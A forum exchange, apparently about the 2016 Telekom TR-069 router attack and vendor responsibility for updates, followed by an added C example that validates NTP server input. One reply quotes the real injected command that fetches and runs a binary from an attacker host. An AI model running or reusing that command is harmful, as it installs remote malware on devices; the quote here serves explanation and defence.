@meveric just an actual discussion in Germany on the 33C3 - I don't know if you ever heard about the "Plasterouter-Massaker" - I think it's used only in German language, but this year 900 000 German telecom routers broke down by a TR-069 attack.
And now there is a big discussion of "Mindesthaltbarkeitsdatum für vernetzte Geräte" - minimum durability date for network devices - https://www.heise.de/newsticker/meldung ... 83224.html
And this would mean that the vendors are responsible, not the SoC producers - like netgear or linksys for the router images and hardkernel for kernel updates and of course vendors of android phones also for updates....
and I will test now with Cubieboard 3 (Cubietruck) - A20, 2 GB, 8 GB Nand, WLAN, BT, SATA - there is already a 4.9 kernel - https://www.robert-sperling.de/en/mainl ... ubietruck/
it's at the moment the best compromise......
First of all, German or European law does not apply in other countries, which you should be aware of.
In fact many countries don't even care about German law inside of Germany. Most prominent probably the U.S.A. which does give a shit about other people's laws, even within these countries' own borders.
Besides that, I live in Germany and yes I heard about this issue, me and my colleagues discussed it at work.
You're actually mixing a few things up here:
The issue happened with a certain brand of very very cheap router, "Plastic-Routers" as the name already said. In fact it was one brand produced by ONE company that had this issue. The same router produced by other companies didn't have this issue. The company in question was actually known for creating bad software, and had similar issues in the past.
The question here should be, why a company like Telekom works together with companies like this.
Besides that, it goes way further. These routers have a maintenance port for the ISP (called TR-069) that allows the ISP to perform firmware updates and other things. This port is normally ONLY used by the ISP. Telekom as an ISP provider totally messed up by facing this port openly to the internet, while it's rather easy for them to keep this port of this device only in their own management network.
So the first to blame is Telekom for totally messing up their security.
Second to blame is the router manufacturer that messes up their router software.
And here's the thing... that's totally unrelated to the Kernel.
It's crappy preinstalled software that allowed a user to execute code.
Not the Kernel was the issue, the preinstalled software. The port was open and accepted XML for config changes, and with a simple request to add a new NTP server you could execute code:
`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`
Once again, this is extremely badly coded software and has NOTHING to do with the Kernel!
The issue here is that the company that put the software on the routers totally messed up. A software that allows something like this is broken by design.
And yes, for issues like this, the new law says the vendor is responsible, cause they put crappy software like this on the device.
And now let's come back to HardKernel and ODROID devices.
The software put on ODROIDs is 99.99% NOT from HardKernel, but from Ubuntu, Debian, Arch and so on.
The Kernel is OpenSource, everyone can read or alter the code.
ODROIDs are not tied to the software, you can change the OS, you can change the Kernel. HardKernel sells HARDWARE not the software.
They are nice enough to put something on their devices for you to start with, they wouldn't need to, cause all info you need to create your own images is publicly available.
The restrictions for this are VERY LIMITED. The libMali.so blob is not OpenSource, and property of ARM; HardKernel is allowed to use it. If there's an issue in that software, the only one to blame is ARM, since the code comes from them!
The boot loader BL1 and BL2. BL1 is once again a blob that comes from a SoC vendor (in this case from Samsung), BL2 can be altered, but must be signed by HardKernel for it to work. The rest, for example u-boot, is once again OpenSource and can be exchanged by the user.
This means you are totally free to alter the system yourself, that you don't have the skills to do so is nothing you can blame on the vendor.
This would be the same as blaming a car dealer for not selling a car that let you drive although you have never learned how to drive!
Since Mali GPU drivers are not required to run the board, that makes the BL1 blob the only part of the entire system that can't be changed and for this is the only thing that you don't have control over.
Everything else you have the chance to change or can choose if you use it or not. Hell, no one says you need to put an ODROID on the Internet in the first place!
And that is totally different compared to a device like a router that you can not touch, where you can not alter the Kernel, or the Software that is installed.
Hell, they are even discussing if in future you should be allowed to put your own firmware on a router or not. This would mean the end of projects like OpenWRT, since you would no longer be allowed to put a different (probably more trusted) firmware on a router.
And that is what makes all the difference.
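
The NTP-server case described in the post above, as an added example that is not part of the thread or of any vendor's firmware: a C sketch of how a device could check a remotely supplied NTP server value before using it. The function names and the sample inputs are hypothetical and constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Hypothetical helper: 1 if s is an IPv4/IPv6 literal or an RFC 1123 hostname,
 * else 0. Only [A-Za-z0-9.-] passes, so ';', '/', spaces, '`' and '$' fail. */
int ntp_server_is_valid(const char *s)
{
    unsigned char addr[16];              /* large enough for an IPv6 address */
    size_t len, label = 0;
    if (s == NULL || (len = strlen(s)) == 0 || len > 253)
        return 0;
    if (inet_pton(AF_INET, s, addr) == 1 || inet_pton(AF_INET6, s, addr) == 1)
        return 1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-')   /* empty label or trailing '-' */
                return 0;
            label = 0;
        } else if (c < 128 && (isalnum(c) || c == '-')) {
            /* a leading '-' could later be read as an option; labels max 63 */
            if ((c == '-' && label == 0) || ++label > 63)
                return 0;
        } else {
            return 0;
        }
    }
    return label > 0 && s[len - 1] != '-';
}

/* Hypothetical setter: store the value only if valid (0 = stored, -1 = rejected).
 * Pass it on as one argv element via execv(), never via system() or "sh -c". */
int apply_ntp_server(const char *value, char *slot, size_t slotlen)
{
    if (!ntp_server_is_valid(value) || strlen(value) >= slotlen)
        return -1;
    memcpy(slot, value, strlen(value) + 1);
    return 0;
}

int main(void)
{
    char slot[64];                       /* inputs below are constructed samples */
    printf("%d %d\n", apply_ntp_server("pool.ntp.org", slot, sizeof slot),
           apply_ntp_server("time.example.net;echo x", slot, sizeof slot));
    return 0;
}
```

Validation like this only covers the software side; keeping the management port reachable solely from the ISP's management network, as the post says, is a separate control.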